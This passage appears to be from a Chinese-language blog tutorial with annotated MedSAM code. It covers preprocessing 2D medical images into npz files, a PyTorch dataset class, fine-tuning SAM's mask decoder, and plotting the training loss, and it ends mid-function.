      # exclude tiny objects 如果分割标签中包含的像素点数大于 100,则执行以下操作(对源图像进行预处理,加入最终的数据集中)
      if np.sum(gt_data)>100:
      # 最大值是 1,就两种像素点。确保分割标签是二值图
      assert np.max(gt_data)==1 and np.unique(gt_data).shape[0]==2, 'ground truth should be binary'
      # 获得图像数据
      image_data = io.imread(join(args.img_path, image_name))
      # 如果图像包含透明度通道,则只取前三个通道,即 RGB 通道
      if image_data.shape[-1]>3 and len(image_data.shape)==3:
      image_data = image_data[:,:,:3]
      # 如果图像只有一个通道,则将其复制三次,即得到一个 RGB 图像
      if len(image_data.shape)==2:
      image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
      # nii preprocess start
      # 计算图像的亮度范围,即确定合适的像素值下限和上限
      # 使用 np.percentile 函数分别计算了图像中像素值从小到大排列后第 0.5% 和第 99.5% 的值,
      # 将其作为下限和上限,用于后续的像素值标准化处理
      lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
      # 将图像中的像素值限制在 lower_bound 和 upper_bound 之间
      image_data_pre = np.clip(image_data, lower_bound, upper_bound)
      # 将调整后的图像进行标准化,方法是先将图像中所有像素值减去最小值,然后除以像素值范围(即最大值减去最小值),最后乘以255,使像素值缩放到0-255的范围。
      # 这样做的目的是为了使得图像不受亮度范围的影响,并且方便后续模型的处理,因为很多模型输入都需要归一化的图像数据
      image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
      # 将背景像素(黑色)设置为 0
      image_data_pre[image_data==0] = 0
      # 调整图像大小,并使用三次样条插值方法进行重采样,使得图像更加平滑,并保持图像的范围不变
      image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
      # 将图像像素值转换为 8 位无符号整数
      image_data_pre = np.uint8(image_data_pre)

      # 将处理后的图像添加到 imgs 列表中
      imgs.append(image_data_pre)
      # 确保分割标签中包含的像素点数大于100(这里为啥又问一遍?闻到了屎山的味道)
      assert np.sum(gt_data)>100, 'ground truth should have more than 100 pixels'
      # 将处理后的分割标签添加到gts列表中
      gts.append(gt_data)
      # resize image to 3*1024*1024
      # 创建一个 ResizeLongestSide 对象
      # ResizeLongestSide 的类,用于将图像和坐标进行长边缩放。
      # 具体来说,该类实现了 apply_image 和 apply_coords 两个方法,分别用于处理图像和坐标
      sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
      # 将该 ResizeLongestSide 对象应用于 image_data_pre 图像,重新调整大小并返回新的图像 resize_img
      resize_img = sam_transform.apply_image(image_data_pre)
      # 将 numpy 数组 resize_img 转换为 PyTorch 张量,同时将其移动到 GPU
      resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
      # 对图像进行预处理,例如减去均值、除以标准差等
      input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
      assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
      # pre-compute the image embedding
      # 对输入图像进行特征提取,得到图片的 embedding
      with torch.no_grad():
      embedding = sam_model.image_encoder(input_image)
      img_embeddings.append(embedding.cpu().numpy()[0])
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      imgs = []  # 图片(images)
      gts = [] # 标签(labels)
      img_embeddings = [] # 图片嵌入信息

      # 遍历 ground truth 文件夹, names 默认为 args.gt_path('data/MedSAMDemo_2D/train/labels')下排序好的文件列表
      for gt_name in tqdm(names):
      image_name = gt_name.split('.')[0] + args.img_name_suffix # 获得文件名称 + 后缀名
      gt_data = io.imread(join(args.gt_path, gt_name)) # 获得 ground truth 数据
      if len(gt_data.shape)==3: # 如果 gt_data 是三维的,则只取第一个通道(灰度图)
      gt_data = gt_data[:,:,0]
      assert len(gt_data.shape)==2, 'ground truth should be 2D' # 确保分割标签是二维的(高和宽)
      # 这行代码的作用是将分割标签(即 gt_data)缩放到指定大小(args.image_size),并将其值转换为二进制形式(0 和 1)。
      # 具体来说,它会将分割标签中所有等于 args.label_id 的像素点设置为 1,其余像素点设置为 0,然后将结果缩放到指定大小。
      # 这里使用了 scikit-image 库的 transform.resize 函数,
      # 并指定了 order=0 表示使用最近邻插值法,
      # preserve_range=True 表示保持输入图像的范围不变(即值仍在 0 到 1 之间),
      # mode='constant' 表示在缩放后填充常数值的方式为使用边界值填充。
      # 最终得到的结果是一个二值图像,即只包含 0 和 1 两种像素值的图像。
      gt_data = transform.resize(gt_data==args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
      # 将gt_data值转换为 8 位无符号整数
      gt_data = np.uint8(gt_data)

      # exclude tiny objects 如果分割标签中包含的像素点数大于 100,则执行以下操作(对源图像进行预处理,加入最终的数据集中)
      if np.sum(gt_data)>100:
      # 最大值是 1,就两种像素点。确保分割标签是二值图
      assert np.max(gt_data)==1 and np.unique(gt_data).shape[0]==2, 'ground truth should be binary'
      # 获得图像数据
      image_data = io.imread(join(args.img_path, image_name))
      # 如果图像包含透明度通道,则只取前三个通道,即 RGB 通道
      if image_data.shape[-1]>3 and len(image_data.shape)==3:
      image_data = image_data[:,:,:3]
      # 如果图像只有一个通道,则将其复制三次,即得到一个 RGB 图像
      if len(image_data.shape)==2:
      image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
      # nii preprocess start
      # 计算图像的亮度范围,即确定合适的像素值下限和上限
      # 使用 np.percentile 函数分别计算了图像中像素值从小到大排列后第 0.5% 和第 99.5% 的值,
      # 将其作为下限和上限,用于后续的像素值标准化处理
      lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
      # 将图像中的像素值限制在 lower_bound 和 upper_bound 之间
      image_data_pre = np.clip(image_data, lower_bound, upper_bound)
      # 将调整后的图像进行标准化,方法是先将图像中所有像素值减去最小值,然后除以像素值范围(即最大值减去最小值),最后乘以255,使像素值缩放到0-255的范围。
      # 这样做的目的是为了使得图像不受亮度范围的影响,并且方便后续模型的处理,因为很多模型输入都需要归一化的图像数据
      image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
      # 将背景像素(黑色)设置为 0
      image_data_pre[image_data==0] = 0
      # 调整图像大小,并使用三次样条插值方法进行重采样,使得图像更加平滑,并保持图像的范围不变
      image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
      # 将图像像素值转换为 8 位无符号整数
      image_data_pre = np.uint8(image_data_pre)

      # 将处理后的图像添加到 imgs 列表中
      imgs.append(image_data_pre)
      # 确保分割标签中包含的像素点数大于100(这里为啥又问一遍?闻到了屎山的味道)
      assert np.sum(gt_data)>100, 'ground truth should have more than 100 pixels'
      # 将处理后的分割标签添加到gts列表中
      gts.append(gt_data)
      # resize image to 3*1024*1024
      # 创建一个 ResizeLongestSide 对象
      # ResizeLongestSide 的类,用于将图像和坐标进行长边缩放。
      # 具体来说,该类实现了 apply_image 和 apply_coords 两个方法,分别用于处理图像和坐标
      sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
      # 将该 ResizeLongestSide 对象应用于 image_data_pre 图像,重新调整大小并返回新的图像 resize_img
      resize_img = sam_transform.apply_image(image_data_pre)
      # 将 numpy 数组 resize_img 转换为 PyTorch 张量,同时将其移动到 GPU
      resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
      # 对图像进行预处理,例如减去均值、除以标准差等
      input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
      assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
      # pre-compute the image embedding
      # 对输入图像进行特征提取,得到图片的 embedding
      with torch.no_grad():
      embedding = sam_model.image_encoder(input_image)
      img_embeddings.append(embedding.cpu().numpy()[0])

      save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

      stack the list to array

      -
      # 将所有2D图像以及它们的相关信息(如 ground truth 和 image embedding)保存成一个 npz 文件
      if len(imgs)>1:
      imgs = np.stack(imgs, axis=0) # (n, 256, 256, 3) 表示 n 张 256x256 的 RGB 图像
      gts = np.stack(gts, axis=0) # (n, 256, 256) 表示 n 张 256x256 的灰度图像
      img_embeddings = np.stack(img_embeddings, axis=0) # (n, 1, 256, 64, 64) 将每张图像转换为了1个256x64x64的图像embedding
      # 使用np.savez_compressed函数将这三个numpy数组保存成一个npz文件,其中imgs、gts和img_embeddings分别对应三个关键字参数
      np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
      # save an example image for sanity check 随机选择一个图像进行可视化检查
      idx = np.random.randint(imgs.shape[0]) # 随机生成一个索引 idx
      # 从 imgs、gts 和 img_embeddings 中提取出该索引对应的图像
      # img_idx、ground truth gt_idx 和 image embedding img_emb_idx
      img_idx = imgs[idx,:,:,:]
      gt_idx = gts[idx,:,:]
      # 代码使用scikit-image库的find_boundaries函数找到gt_idx中每个目标的边缘位置,并将img_idx中边缘位置的像素设为红色
      bd = segmentation.find_boundaries(gt_idx, mode='inner')
      # 将边缘设为红色
      img_idx[bd, :] = [255, 0, 0]
      # 使用io.imsave函数将处理后的img_idx保存成png文件,以便进一步进行可视化检查
      io.imsave(save_path + '.png', img_idx, check_contrast=False)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      # 将所有2D图像以及它们的相关信息(如 ground truth 和 image embedding)保存成一个 npz 文件
      if len(imgs)>1:
      imgs = np.stack(imgs, axis=0) # (n, 256, 256, 3) 表示 n 张 256x256 的 RGB 图像
      gts = np.stack(gts, axis=0) # (n, 256, 256) 表示 n 张 256x256 的灰度图像
      img_embeddings = np.stack(img_embeddings, axis=0) # (n, 1, 256, 64, 64) 将每张图像转换为了1个256x64x64的图像embedding
      # 使用np.savez_compressed函数将这三个numpy数组保存成一个npz文件,其中imgs、gts和img_embeddings分别对应三个关键字参数
      np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
      # save an example image for sanity check 随机选择一个图像进行可视化检查
      idx = np.random.randint(imgs.shape[0]) # 随机生成一个索引 idx
      # 从 imgs、gts 和 img_embeddings 中提取出该索引对应的图像
      # img_idx、ground truth gt_idx 和 image embedding img_emb_idx
      img_idx = imgs[idx,:,:,:]
      gt_idx = gts[idx,:,:]
      # 代码使用scikit-image库的find_boundaries函数找到gt_idx中每个目标的边缘位置,并将img_idx中边缘位置的像素设为红色
      bd = segmentation.find_boundaries(gt_idx, mode='inner')
      # 将边缘设为红色
      img_idx[bd, :] = [255, 0, 0]
      # 使用io.imsave函数将处理后的img_idx保存成png文件,以便进一步进行可视化检查
      io.imsave(save_path + '.png', img_idx, check_contrast=False)

      finetune_and_inference_tutorial_2D_dataset.ipynb

      在获得预处理好的数据集后,就可以运行 finetune_and_inference_tutorial_2D_dataset.ipynb 对 SAM 模型进行 fine-tune。

      class NpzDataset(Dataset)

      -
      class NpzDataset(Dataset): 
      def __init__(self, data_root):
      # 读取指定目录下的所有 .npz 文件
      self.data_root = data_root
      self.npz_files = sorted(os.listdir(self.data_root))
      self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
      # this implementation is ugly but it works (and is also fast for feeding data to GPU) if your server has enough RAM as an alternative, you can also use a list of npy files and load them one by one
      # 这个实现是丑陋的,但它可以工作(并且向 GPU 提供数据的速度也很快)如果你的服务器有足够的 RAM 作为替代方案,你也可以使用 npy 文件列表并一个一个地加载它们
      # 使用了 np.vstack() 函数对这些数组进行垂直方向上的堆叠操作
      # 将它们的 gts 和 img_embeddings 字段整合成两个 numpy 数组: ori_gts 和 img_embeddings
      self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
      self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
      # 包含了一条有用的调试信息输出语句,输出实际读取数据文件中的 img_embeddings 和 ori_gts 的形状
      print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

      def __len__(self):
      """
      这段代码定义了 __len__ 方法,该方法返回数据集的大小(即所有样本的个数),在该代码中返回的是 ori_gts 数组的第一维大小。
      由于在 NpzDataset 类初始化时,已经将所有 npz 文件中的 gts 字段整合成一个 numpy 数组 ori_gts,因此该方法返回的是所有读取文件中的目标个数(即数据集中的样本数)
      """
      return self.ori_gts.shape[0]

      def __getitem__(self, index):
      # 词嵌入向量
      img_embed = self.img_embeddings[index]
      # Ground Truth
      gt2D = self.ori_gts[index]
      # 边界框
      y_indices, x_indices = np.where(gt2D > 0)
      x_min, x_max = np.min(x_indices), np.max(x_indices)
      y_min, y_max = np.min(y_indices), np.max(y_indices)
      # add perturbation to bounding box coordinates
      # 向边界框坐标添加扰动,以实现数据增强
      H, W = gt2D.shape
      x_min = max(0, x_min - np.random.randint(0, 20))
      x_max = min(W, x_max + np.random.randint(0, 20))
      y_min = max(0, y_min - np.random.randint(0, 20))
      y_max = min(H, y_max + np.random.randint(0, 20))
      bboxes = np.array([x_min, y_min, x_max, y_max])
      # convert img embedding, mask, bounding box to torch tensor
      # 返回一个三元组:(一个图像的嵌入向量 img_embed, 对应标注的二维 Ground Truth 图 gt2D, 对应的包含目标的边界框的四个坐标 bboxes)
      return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :,:]).long(), torch.tensor(bboxes).float()
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      class NpzDataset(Dataset): 
      def __init__(self, data_root):
      # 读取指定目录下的所有 .npz 文件
      self.data_root = data_root
      self.npz_files = sorted(os.listdir(self.data_root))
      self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
      # this implementation is ugly but it works (and is also fast for feeding data to GPU) if your server has enough RAM as an alternative, you can also use a list of npy files and load them one by one
      # 这个实现是丑陋的,但它可以工作(并且向 GPU 提供数据的速度也很快)如果你的服务器有足够的 RAM 作为替代方案,你也可以使用 npy 文件列表并一个一个地加载它们
      # 使用了 np.vstack() 函数对这些数组进行垂直方向上的堆叠操作
      # 将它们的 gts 和 img_embeddings 字段整合成两个 numpy 数组: ori_gts 和 img_embeddings
      self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
      self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
      # 包含了一条有用的调试信息输出语句,输出实际读取数据文件中的 img_embeddings 和 ori_gts 的形状
      print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

      def __len__(self):
      """
      这段代码定义了 __len__ 方法,该方法返回数据集的大小(即所有样本的个数),在该代码中返回的是 ori_gts 数组的第一维大小。
      由于在 NpzDataset 类初始化时,已经将所有 npz 文件中的 gts 字段整合成一个 numpy 数组 ori_gts,因此该方法返回的是所有读取文件中的目标个数(即数据集中的样本数)
      """
      return self.ori_gts.shape[0]

      def __getitem__(self, index):
      # 词嵌入向量
      img_embed = self.img_embeddings[index]
      # Ground Truth
      gt2D = self.ori_gts[index]
      # 边界框
      y_indices, x_indices = np.where(gt2D > 0)
      x_min, x_max = np.min(x_indices), np.max(x_indices)
      y_min, y_max = np.min(y_indices), np.max(y_indices)
      # add perturbation to bounding box coordinates
      # 向边界框坐标添加扰动,以实现数据增强
      H, W = gt2D.shape
      x_min = max(0, x_min - np.random.randint(0, 20))
      x_max = min(W, x_max + np.random.randint(0, 20))
      y_min = max(0, y_min - np.random.randint(0, 20))
      y_max = min(H, y_max + np.random.randint(0, 20))
      bboxes = np.array([x_min, y_min, x_max, y_max])
      # convert img embedding, mask, bounding box to torch tensor
      # 返回一个三元组:(一个图像的嵌入向量 img_embed, 对应标注的二维 Ground Truth 图 gt2D, 对应的包含目标的边界框的四个坐标 bboxes)
      return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :,:]).long(), torch.tensor(bboxes).float()

      test dataset class and dataloader

      -
      npz_tr_path = 'data/demo2D_vit_b'
      # 使用路径 npz_tr_path 创建了一个新的 NpzDataset 实例 demo_dataset
      demo_dataset = NpzDataset(npz_tr_path)
      # 训练开始前,代码使用 for 循环从 demo_dataloader 中依次读取一个小批量(batch)的数据,用于测试数据集和数据加载器的正确性。批大小为 8,这意味着每次迭代中将读取 8 个数据样本
      demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
      for img_embed, gt2D, bboxes in demo_dataloader:
      # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
      # 使用 print() 函数打印了从 demo_dataloader 中读取的第一个小批量 img_embed、gt2D 和 bboxes 的形状,以确认它们是否与预期一致
      print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
      # 这里程序使用 break 结束了遍历,只输出了第一个小批量的结果
      break
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      npz_tr_path = 'data/demo2D_vit_b'
      # 使用路径 npz_tr_path 创建了一个新的 NpzDataset 实例 demo_dataset
      demo_dataset = NpzDataset(npz_tr_path)
      # 训练开始前,代码使用 for 循环从 demo_dataloader 中依次读取一个小批量(batch)的数据,用于测试数据集和数据加载器的正确性。批大小为 8,这意味着每次迭代中将读取 8 个数据样本
      demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
      for img_embed, gt2D, bboxes in demo_dataloader:
      # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
      # 使用 print() 函数打印了从 demo_dataloader 中读取的第一个小批量 img_embed、gt2D 和 bboxes 的形状,以确认它们是否与预期一致
      print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
      # 这里程序使用 break 结束了遍历,只输出了第一个小批量的结果
      break

      set up model for fine-tuning

      -
      # train data path
      npz_tr_path = 'data/demo2D_vit_b' # 训练数据
      work_dir = './work_dir' # 工作目录路径
      task_name = 'demo2D' # 任务名称
      # prepare SAM model
      model_type = 'vit_b' # 模型类型
      checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth' # 预训练模型
      device = 'cuda:0' # 设备
      model_save_path = join(work_dir, task_name) # 模型保存地址
      os.makedirs(model_save_path, exist_ok=True)
      sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device) # 加载模型
      sam_model.train() # 设为训练模式
      # Set up the optimizer, hyperparameter tuning will improve performance here
      optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0) # 优化器
      # 代码定义了一个分割损失函数,其中采用 DiceLoss 和 CrossEntropyLoss 的结合体。
      # DiceLoss 是一个测量预测分割与真实分割偏差的指标,CrossEntropyLoss 则是针对多分类问题的损失函数,用于评估预测结果的匹配程度
      seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean') # 损失函数
      -
      self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
      img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      # train data path
      npz_tr_path = 'data/demo2D_vit_b' # 训练数据
      work_dir = './work_dir' # 工作目录路径
      task_name = 'demo2D' # 任务名称
      # prepare SAM model
      model_type = 'vit_b' # 模型类型
      checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth' # 预训练模型
      device = 'cuda:0' # 设备
      model_save_path = join(work_dir, task_name) # 模型保存地址
      os.makedirs(model_save_path, exist_ok=True)
      sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device) # 加载模型
      sam_model.train() # 设为训练模式
      # Set up the optimizer, hyperparameter tuning will improve performance here
      optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0) # 优化器
      # 代码定义了一个分割损失函数,其中采用 DiceLoss 和 CrossEntropyLoss 的结合体。
      # DiceLoss 是一个测量预测分割与真实分割偏差的指标,CrossEntropyLoss 则是针对多分类问题的损失函数,用于评估预测结果的匹配程度
      seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean') # 损失函数
      +
      1
      2
      self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
      img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

      training

      原作者用的是 NVIDIA RTX A5500,配有 24 GB 显存,而我的 RTX 4060 只有 8GB 显存,emmm 只能把 batch_size 调小。我调成了 8。训练过程中显存使用量一直维持在 2GB,感觉可以再调大些?

      -
      num_epochs = 100  # 迭代次数
      losses = [] # 空列表,用于存放每个 epoch 的损失值
      best_loss = 1e10 # 最优损失值
      train_dataset = NpzDataset(npz_tr_path) # 读入训练数据
      # 定义数据加载器以便读取和组合数据,同时将样本分成大小为 64 的批次,并打乱顺序
      train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
      for epoch in range(num_epochs):
      epoch_loss = 0
      # train
      # step 表示当前处理到了第几个批次
      # image_embedding 是嵌入图像的特征向量
      # gt2D 是训练数据的真实遮罩层标签
      # boxes 是真实的 2D 边界框
      for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
      # do not compute gradients for image encoder and prompt encoder
      # 冻结 图像编码器 和 提示编码器
      with torch.no_grad():
      # convert box to 1024x1024 grid
      # 将边界框坐标从原始坐标系转换为 1024x1024 网格坐标系
      box_np = boxes.numpy()
      # 改变大小
      sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
      # 改变提示框大小
      box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
      # 转换成 pytorch 张量
      box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
      if len(box_torch.shape) == 2:
      """
      这段代码实现的是获取提示嵌入的过程。
      首先通过 if 语句来判断 box_torch 张量的形状是否为 (B, 4),
      其中 B 表示批次大小,4 表示边界框的坐标信息(左上角点和右下角点)。
      如果 box_torch 张量的形状是 (B, 4),则执行 if 语句中的代码进行扩维处理,
      将其转换为形状为 (B, 1, 4) 的张量。
      这么做是为了在后面的计算中保证输入张量的形状一致,从而避免出现维度不匹配的错误
      """
      box_torch = box_torch[:, None, :] # (B, 1, 4)
      # get prompt embeddings 获取提示嵌入
      sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
      points=None, # 没有用到点的信息
      boxes=box_torch, # 使用边界框来提取特征
      masks=None, # 没有使用遮罩层来进行像素级的聚合
      )
      # predicted masks 前向传播
      mask_predictions, _ = sam_model.mask_decoder(
      image_embeddings=image_embedding.to(device), # (B, 256, 64, 64)
      image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
      sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
      dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
      multimask_output=False,
      )

      # 计算损失函数的值
      loss = seg_loss(mask_predictions, gt2D.to(device))
      # 反向传播
      optimizer.zero_grad()
      loss.backward()
      optimizer.step()
      # 记录损失值
      epoch_loss += loss.item()

      epoch_loss /= step
      losses.append(epoch_loss)
      print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
      # save the latest model checkpoint
      torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth')) # 最近一次 checkpoint
      # save the best model
      if epoch_loss < best_loss:
      best_loss = epoch_loss
      torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth')) # 最优 checkpoint
      -
      self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
      100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
      EPOCH: 0, Loss: 0.2000392587589366
      ……
      100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
      EPOCH: 99, Loss: 0.03958414628037384
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      num_epochs = 100  # 迭代次数
      losses = [] # 空列表,用于存放每个 epoch 的损失值
      best_loss = 1e10 # 最优损失值
      train_dataset = NpzDataset(npz_tr_path) # 读入训练数据
      # 定义数据加载器以便读取和组合数据,同时将样本分成大小为 64 的批次,并打乱顺序
      train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
      for epoch in range(num_epochs):
      epoch_loss = 0
      # train
      # step 表示当前处理到了第几个批次
      # image_embedding 是嵌入图像的特征向量
      # gt2D 是训练数据的真实遮罩层标签
      # boxes 是真实的 2D 边界框
      for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
      # do not compute gradients for image encoder and prompt encoder
      # 冻结 图像编码器 和 提示编码器
      with torch.no_grad():
      # convert box to 1024x1024 grid
      # 将边界框坐标从原始坐标系转换为 1024x1024 网格坐标系
      box_np = boxes.numpy()
      # 改变大小
      sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
      # 改变提示框大小
      box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
      # 转换成 pytorch 张量
      box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
      if len(box_torch.shape) == 2:
      """
      这段代码实现的是获取提示嵌入的过程。
      首先通过 if 语句来判断 box_torch 张量的形状是否为 (B, 4),
      其中 B 表示批次大小,4 表示边界框的坐标信息(左上角点和右下角点)。
      如果 box_torch 张量的形状是 (B, 4),则执行 if 语句中的代码进行扩维处理,
      将其转换为形状为 (B, 1, 4) 的张量。
      这么做是为了在后面的计算中保证输入张量的形状一致,从而避免出现维度不匹配的错误
      """
      box_torch = box_torch[:, None, :] # (B, 1, 4)
      # get prompt embeddings 获取提示嵌入
      sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
      points=None, # 没有用到点的信息
      boxes=box_torch, # 使用边界框来提取特征
      masks=None, # 没有使用遮罩层来进行像素级的聚合
      )
      # predicted masks 前向传播
      mask_predictions, _ = sam_model.mask_decoder(
      image_embeddings=image_embedding.to(device), # (B, 256, 64, 64)
      image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
      sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
      dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
      multimask_output=False,
      )

      # 计算损失函数的值
      loss = seg_loss(mask_predictions, gt2D.to(device))
      # 反向传播
      optimizer.zero_grad()
      loss.backward()
      optimizer.step()
      # 记录损失值
      epoch_loss += loss.item()

      epoch_loss /= step
      losses.append(epoch_loss)
      print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
      # save the latest model checkpoint
      torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth')) # 最近一次 checkpoint
      # save the best model
      if epoch_loss < best_loss:
      best_loss = epoch_loss
      torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth')) # 最优 checkpoint
      +
      1
      2
      3
      4
      5
      6
      self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
      100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
      EPOCH: 0, Loss: 0.2000392587589366
      ……
      100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
      EPOCH: 99, Loss: 0.03958414628037384

      plot loss

      -
      plt.plot(losses)
      plt.title('Dice + Cross Entropy Loss')
      plt.xlabel('Epoch')
      plt.ylabel('Loss')
      plt.show() # comment this line if you are running on a server
      plt.savefig(join(model_save_path, 'train_loss.png'))
      plt.close()
      +
      1
      2
      3
      4
      5
      6
      7
      plt.plot(losses)
      plt.title('Dice + Cross Entropy Loss')
      plt.xlabel('Epoch')
      plt.ylabel('Loss')
      plt.show() # comment this line if you are running on a server
      plt.savefig(join(model_save_path, 'train_loss.png'))
      plt.close()

      如果我把 pycharm 的主题设成深色的,matplotlib 输出的图片居然也会是深色的……

      png

      load the original SAM model

      -
      from skimage import io
      # 加载 原始 SAM 模型 到 GPU 上
      ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
      # 加载 predictor
      ori_sam_predictor = SamPredictor(ori_sam_model)

      # 读入数据集
      ts_img_path = 'data/MedSAMDemo_2D/test/images'
      ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
      test_names = sorted(os.listdir(ts_img_path))

      # random select a test case
      # 随机读取一张图像
      img_idx = np.random.randint(len(test_names)) # 获取索引
      image_data = io.imread(join(ts_img_path, test_names[img_idx])) # 读取
      if image_data.shape[-1]>3 and len(image_data.shape)==3: # 确保图像只有 3 个通道
      image_data = image_data[:,:,:3]
      if len(image_data.shape)==2: # 如果是单通道的灰度图像,转成 3 通道
      image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
      # read ground truth (gt should have the same name as the image) and simulate a bounding box
      def get_bbox_from_mask(mask):
      '''
